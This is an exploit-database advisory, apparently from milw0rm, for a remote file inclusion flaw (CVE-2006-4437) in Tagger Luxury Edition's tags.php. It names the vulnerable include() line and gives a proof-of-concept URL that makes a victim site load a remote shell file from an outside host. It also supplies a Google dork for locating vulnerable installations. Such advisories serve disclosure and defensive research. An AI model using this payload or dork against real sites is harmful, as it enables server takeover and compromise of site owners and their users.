Tagger Luxury Edition - 'BBCodeFile' Remote File Inclusion

Author: Morgan
type: webapps
platform: php
port: 
date_added: 2006-08-08  
date_updated:   
verified: 1  
codes: OSVDB-28757;CVE-2006-4437;OSVDB-28756;OSVDB-28755  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2157.txt  

Tagger v3 <= BBCodeFile Remote file inclusion

Discovered by : Morgan

Error in : tags.php
include($BBCodeFile);

Vendor Website: http://www.venturenine.com

PoC:
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?

Google dork:

intitle:"Tagger LE" inurl:tags.php

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan

# milw0rm.com [2006-08-09]